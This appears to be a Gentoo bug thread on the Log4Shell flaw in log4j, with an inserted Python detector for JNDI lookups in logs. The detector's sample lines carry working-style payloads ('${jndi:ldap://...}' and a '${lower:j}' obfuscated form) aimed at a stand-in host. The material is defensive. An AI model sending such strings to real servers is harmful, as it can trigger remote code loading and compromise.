https://www.lunasec.io/docs/blog/log4j-zero-day/ Remote code execution exists in log4j where untrusted input is logged. Patch at URL. POC: https://github.com/tangxiaofeng7/apache-log4j-poc Fix appears to be in 2.15.0, please bump.
I think this only affects 2.x.
(In reply to Sam James from comment #1)
> I think this only affects 2.x.

https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

"Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip] CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you @garydgregory for pointing this out)."
(In reply to John Helmert III from comment #2)
> (In reply to Sam James from comment #1)
> > I think this only affects 2.x.
>
> https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
>
> "Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip]
> CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would
> say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you
> @garydgregory for pointing this out)."

Well, seems like the impact in 1.x is limited to DoS (maybe?) based on https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301.
(In reply to John Helmert III from comment #3)
> (In reply to John Helmert III from comment #2)
> > (In reply to Sam James from comment #1)
> > > I think this only affects 2.x.
> >
> > https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
> >
> > "Hi @yuezk, as far as I can tell, log4j 1.x does not support lookups. [snip]
> > CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would
> > say that, yes, log4j 1.x is also impacted by this vulnerability (Thank you
> > @garydgregory for pointing this out)."
>
> Well, seems like the impact in 1.x is limited to DoS (maybe?) based on
> https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301.

Actually, RCE in non-default configuration: https://www.openwall.com/lists/oss-security/2021/12/13/1
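The thread above turns on one mechanism: log4j 2.x evaluates `${...}` lookups inside logged messages, and the `jndi` lookup is the one that reaches out over the network. The following Python detector is an added example, written for this page from a defender's side; it is not code from the bug report, from Gentoo or from the Log4j project. It scans constructed sample log lines for the literal `${jndi:` form and goes slightly beyond the text by also collapsing the simplest nested lookups (`${lower:x}`, `${upper:x}` and the `${name:-default}` form) before matching, since those are the usual way the string `jndi` is hidden from naive grep-style checks. The sample lines, the `example.invalid` hosts and the `Finding` record are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not taken from the bug report): a web access log
# whose user-agent field is exactly the kind of untrusted input that ends up
# in a log4j message.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# The literal form of a log4j 2.x JNDI lookup: "${", optional whitespace, "jndi", ":".
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Innermost lookups that evaluate to plain text and are therefore used to
# hide the string "jndi": ${lower:x}, ${upper:x}, and the ${name:-default} form.
_TEXT_LOOKUP_RE = re.compile(
    r"\$\{(lower|upper):([^${}]*)\}"      # case-changing lookups
    r"|\$\{[^${}]*:-([^${}]*)\}",         # default-value syntax
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    snippet: str


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse innermost text-producing lookups until nothing changes."""
    def repl(m: "re.Match") -> str:
        if m.group(1):
            inner = m.group(2)
            return inner.lower() if m.group(1).lower() == "lower" else inner.upper()
        return m.group(3)

    prev = None
    while prev != text:
        prev = text
        text = _TEXT_LOOKUP_RE.sub(repl, text)
    return text


def scan_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if the line carries a JNDI lookup (plain or lightly nested)."""
    normalized = normalize_lookups(line)
    # Check the normalized text first, then the raw line, so a lookup that the
    # normalizer happened to rewrite is still caught in its original form.
    for candidate in (normalized, line):
        m = JNDI_RE.search(candidate)
        if m:
            return Finding(line_no, "jndi lookup", candidate[m.start():m.start() + 60])
    # A lookup nested inside another lookup is unusual in untrusted input; flag it
    # as a weaker signal even when no "jndi" surfaced after normalization.
    if re.search(r"\$\{[^}]*\$\{", line):
        start = line.find("${")
        return Finding(line_no, "nested lookup", line[start:start + 60])
    return None


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan numbered lines and keep only the ones that produced a finding."""
    return [f for f in (scan_line(i, l) for i, l in enumerate(lines, 1)) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: {f.reason}: {f.snippet}")
```

Run it on the embedded samples and lines 2 and 3 are reported as `jndi lookup`; line 4 carries a `${date:...}` lookup but is left alone, which is the point of matching on the lookup name rather than on `${` by itself. The normalizer is deliberately small: it only resolves lookups that produce plain text, so a line it cannot simplify is still scanned as-is rather than silently dropped.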
The affected package is last-rited, see https://bugs.gentoo.org/829192#c1
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e55b6f037bdb41eae1559ecb953865d39a71105e

commit e55b6f037bdb41eae1559ecb953865d39a71105e
Author:     Jakov Smolić <jsmolic@gentoo.org>
AuthorDate: 2022-05-04 08:11:29 +0000
Commit:     Jakov Smolić <jsmolic@gentoo.org>
CommitDate: 2022-05-04 08:13:46 +0000

    dev-java/log4j: treeclean

    Bug: https://bugs.gentoo.org/828657
    Bug: https://bugs.gentoo.org/719146
    Bug: https://bugs.gentoo.org/829192
    Signed-off-by: Jakov Smolić <jsmolic@gentoo.org>

 dev-java/log4j/Manifest               |  1 -
 dev-java/log4j/log4j-1.2.17-r3.ebuild | 70 -----------------------------------
 dev-java/log4j/metadata.xml           | 12 ------
 profiles/package.mask                 |  6 ---
 4 files changed, 89 deletions(-)
commit e55b6f037bdb41eae1559ecb953865d39a71105e
Author: Jakov Smolić <jsmolic@gentoo.org>
Date:   Wed May 4 10:11:29 2022 +0200

    dev-java/log4j: treeclean